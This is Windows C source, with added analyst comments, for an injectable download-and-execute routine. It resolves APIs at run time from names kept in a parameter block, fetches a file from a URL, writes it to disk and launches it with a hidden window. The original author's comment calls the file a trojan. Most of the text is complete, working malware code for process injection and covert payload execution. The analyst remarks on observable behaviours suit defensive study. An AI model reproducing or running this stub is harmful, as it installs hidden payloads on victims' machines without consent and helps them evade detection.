1. #include "stdafx.h"
2. #include "stdio.h"
3. #include "string.h"
4. #include
5. #include
6. #include "tlhelp32.h"
7. #pragma comment(lib,"wininet.lib")
8.
9. /***********************************************/
/*
 * Function-pointer types for every API the thread routine calls.
 * The routine never calls these APIs by name; it looks each one up at
 * run time with GetProcAddress and calls it through one of these types.
 */

/* shell32.dll: ShellExecute */
typedef HINSTANCE (__stdcall *fun_ShellExecute)(HWND hWnd,
                                                LPCTSTR lpOperation,
                                                LPCTSTR lpFile,
                                                LPCTSTR lpParameters,
                                                LPCTSTR lpDiretory,
                                                INT nShowCmd);

/* user32.dll: MessageBoxA prototype */
typedef int (__stdcall *fun_MessageBox)(HWND hWnd, LPCTSTR lpszText,
                                        LPCTSTR lpszCaption, UINT nType);

// define functions in kernel32.dll
typedef HANDLE (__stdcall *fun_CreateFile)( LPCTSTR, DWORD, DWORD,   /* CreateFileA */
                                            LPSECURITY_ATTRIBUTES,
                                            DWORD, DWORD, HANDLE );
typedef BOOL (__stdcall *fun_WriteFile)( HANDLE, LPCVOID, DWORD,     /* WriteFile */
                                         LPDWORD, LPOVERLAPPED );
typedef BOOL (__stdcall *fun_CloseHandle)( HANDLE hObject );         /* CloseHandle */
typedef HMODULE (__stdcall *fun_GetModuleHandle)(LPCTSTR);           /* GetModuleHandle */
typedef FARPROC (__stdcall *fun_GetProcAddress)(HMODULE, LPCTSTR);   /* GetProcAddress */
typedef HINSTANCE (__stdcall *fun_LoadLibrary)(LPCTSTR);             /* LoadLibraryA */

// define functions in wininet.dll
typedef HINTERNET (__stdcall *fun_InternetOpen)(IN LPCTSTR lpszAgent,       /* InternetOpen */
                                                IN DWORD dwAccessType,
                                                IN LPCTSTR lpszProxyByName,
                                                IN LPCTSTR lpszProxyByPass,
                                                IN DWORD dwFlags);
typedef HINTERNET (__stdcall *fun_InternetOpenUrl)(IN HINTERNET hInternet,  /* InternetOpenUrl */
                                                   IN LPCTSTR lpszUrl,
                                                   IN LPCTSTR lpszHeaders OPTIONAL,
                                                   IN DWORD dwHeadersLength,
                                                   IN DWORD dwFlags,
                                                   IN DWORD dwContext);
typedef HINTERNET (__stdcall *fun_InternetReadFile)(IN HINTERNET hFile,     /* InternetReadFile */
                                                    IN LPVOID lpBuffer,
                                                    IN DWORD dwNumberOfBytesToRead,
                                                    OUT LPDWORD lpdwNumberOfBytesRead);
typedef HINTERNET (__stdcall *fun_InternetCloseHandle)(IN HINTERNET hInternet); /* InternetCloseHandle */
48.
49.
/*
 * Parameter block handed to ThreadProc.  The original comment says it is
 * meant to be copied into a remote process; the code that does the copy is
 * not shown on this page.
 *
 * The block holds the three bootstrap function pointers plus every DLL name,
 * export name, URL and path as plain strings.  ThreadProc therefore needs no
 * import table entries or string literals of its own.  For an analyst this
 * block is the useful artefact: the URL and drop path sit in it as readable
 * text.
 */
typedef struct tag_Inject // define a structure to copy to the remote process
{
    /* Bootstrap pointers, used to find every other API at run time. */
    fun_GetModuleHandle GetModuleHandle;
    fun_GetProcAddress GetProcAddress;
    fun_LoadLibrary LoadLibrary;

    /* DLL names passed to GetModuleHandle / LoadLibrary. */
    char szKernel[32];
    char szUser[32];
    char szNet[32];
    char szShell[32];

    /* Export names passed to GetProcAddress. */
    char szMessageBox[32];
    char szInternetOpen[32];
    char szInternetOpenUrl[MAX_PATH];
    char szInternetReadFile[128];
    char szInternetCloseHandle[32];
    char szCreateFile[32];
    char szWriteFile[32];
    char szCloseHandle[32];
    char szShellExecute[32];

    char szHeader[16];           /* passed as the headers argument of InternetOpenUrl */
    char szInterFlag[32];        /* passed as the agent string of InternetOpen */
    char szOpenFlag[10];         /* not read by the ThreadProc shown on this page */
    char szUrlAddr[MAX_PATH];    /* URL that ThreadProc downloads */
    char szUrlAddr1[MAX_PATH];   /* not read by the ThreadProc shown on this page */
    char szFilePath[MAX_PATH];   /* local path the download is written to, then executed */
    char szFilePath1[MAX_PATH];  /* not read by the ThreadProc shown on this page */
}Inject;
76.
77. /***************************************/
78.
79. /************************************************/
/*
 * Thread routine driven entirely by the Inject block it receives.
 *
 * Steps, in order:
 *   1. Get handles to the four DLLs named in the block (GetModuleHandle,
 *      falling back to LoadLibrary).
 *   2. Resolve each API by name with GetProcAddress.
 *   3. Open szUrlAddr through WinINet with caching disabled.
 *   4. Copy the response into a newly created file at szFilePath.
 *   5. Launch szFilePath through ShellExecute with SW_HIDE.
 *
 * Returns FALSE when a module cannot be obtained, when InternetOpen or
 * InternetOpenUrl returns NULL, or when the CreateFile result compares equal
 * to NULL; returns TRUE otherwise.
 *
 * Analyst note: the original author's comment on the last call labels the
 * downloaded file a trojan.  The routine is a download-and-execute stub:
 * it has no static imports, carries API names as data, fetches a file to
 * disk and runs it with a hidden window.  The behaviours a defender can
 * observe are wininet.dll and shell32.dll being loaded into a process that
 * does not normally use them, a file being created and filled from a network
 * read, and that same file being started immediately afterwards.
 */
static BOOL ThreadProc(Inject* Inject_info)
{
    HMODULE hKernel32, hUser32, hWininet, hShell32; // module handles

    fun_InternetOpen j_InternetOpen; // function pointers, filled in below
    fun_InternetOpenUrl j_InternetOpenUrl;
    fun_InternetReadFile j_InternetReadFile;
    fun_InternetCloseHandle j_InternetCloseHandle;
    fun_CreateFile j_CreateFile;
    fun_WriteFile j_WriteFile;
    fun_CloseHandle j_CloseHandle;
    fun_MessageBox j_MessageBox;
    fun_ShellExecute j_ShellExecute;

    hKernel32 = Inject_info->GetModuleHandle(Inject_info->szKernel); // use the module if it is already loaded
    if (NULL == hKernel32) // not loaded yet
    {
        hKernel32 = Inject_info->LoadLibrary(Inject_info->szKernel); // load it explicitly
        if (NULL == hKernel32) // explicit load failed
        {
            return FALSE;
        }
    }

    // Same lookup-then-load sequence for the module named in szUser.
    hUser32 = Inject_info->GetModuleHandle(Inject_info->szUser);
    if (NULL == hUser32)
    {
        hUser32 = Inject_info->LoadLibrary(Inject_info->szUser);
        if (NULL == hUser32)
        {
            return FALSE;
        }
    }

    // Same sequence for the module named in szNet (the WinINet functions are resolved from it).
    hWininet = Inject_info->GetModuleHandle(Inject_info->szNet);
    if (NULL == hWininet)
    {
        hWininet = Inject_info->LoadLibrary(Inject_info->szNet);
        if (NULL == hWininet)
        {
            return FALSE;
        }
    }

    // Same sequence for the module named in szShell (ShellExecute is resolved from it).
    hShell32 = Inject_info->GetModuleHandle(Inject_info->szShell);
    if (NULL == hShell32)
    {
        hShell32 = Inject_info->LoadLibrary(Inject_info->szShell);
        if (NULL == hShell32)
        {
            return FALSE;
        }
    }

    // Resolve every API by the name stored in the parameter block.
    j_InternetOpen = (fun_InternetOpen)Inject_info->GetProcAddress(hWininet, // bind InternetOpen
        Inject_info->szInternetOpen);
    j_InternetOpenUrl = (fun_InternetOpenUrl)Inject_info->GetProcAddress(hWininet, // bind InternetOpenUrl
        Inject_info->szInternetOpenUrl);
    j_InternetReadFile = (fun_InternetReadFile)Inject_info->GetProcAddress(hWininet, // bind InternetReadFile
        Inject_info->szInternetReadFile);
    j_InternetCloseHandle = (fun_InternetCloseHandle)Inject_info->GetProcAddress(hWininet, // bind InternetCloseHandle
        Inject_info->szInternetCloseHandle);

    j_CreateFile = (fun_CreateFile)Inject_info->GetProcAddress(hKernel32, // bind CreateFile
        Inject_info->szCreateFile);
    j_WriteFile = (fun_WriteFile)Inject_info->GetProcAddress(hKernel32, // bind WriteFile
        Inject_info->szWriteFile);
    j_CloseHandle = (fun_CloseHandle)Inject_info->GetProcAddress(hKernel32, // bind CloseHandle
        Inject_info->szCloseHandle);
    j_MessageBox = (fun_MessageBox)Inject_info->GetProcAddress(hUser32, // bind MessageBox (not called in this routine)
        Inject_info->szMessageBox);
    j_ShellExecute = (fun_ShellExecute)Inject_info->GetProcAddress(hShell32, // bind ShellExecute
        Inject_info->szShellExecute);
    HINTERNET hNet, hFile; // WinINet session handle and URL resource handle

    hNet = j_InternetOpen(Inject_info->szInterFlag, INTERNET_OPEN_TYPE_PRECONFIG,
        NULL, NULL, 0); // open a WinINet session; szInterFlag is the agent string
    if (NULL == hNet) // session could not be opened
    {
        return FALSE;
    }

    hFile = j_InternetOpenUrl(hNet, Inject_info->szUrlAddr, Inject_info->szHeader,
        strlen(Inject_info->szHeader),
        INTERNET_FLAG_DONT_CACHE|INTERNET_FLAG_RELOAD, 0); // open the URL, bypassing the cache, and get its resource handle
    if (NULL == hFile) // URL could not be opened
    {
        return FALSE;
    }

    char buff[1024]; // transfer buffer
    DWORD dwRead, // bytes returned by the last read
        dwWritten = NULL; // bytes actually written by the last write

    HANDLE hCreateFile = j_CreateFile(Inject_info->szFilePath, GENERIC_READ|GENERIC_WRITE, // CREATE_ALWAYS: always create the file
        0, NULL, CREATE_ALWAYS, 0 ,NULL);
    if (NULL == hCreateFile) // author's check for a failed create
    {
        return FALSE;
    }
    while(j_InternetReadFile(hFile, buff, 1023, &dwRead))
    {
        if (0 == dwRead) // zero bytes read: stop copying
            break;
        j_WriteFile(hCreateFile, buff, dwRead, &dwWritten, NULL); // append the chunk to the local file

    }
    j_InternetCloseHandle(hNet); // close the session handle
    j_InternetCloseHandle(hFile); // close the URL resource handle
    j_CloseHandle(hCreateFile); // close the local file handle

    j_ShellExecute(NULL, NULL, Inject_info->szFilePath, NULL, NULL, SW_HIDE); // original comment: "run the trojan"; starts the downloaded file with a hidden window


    return TRUE;
}
196.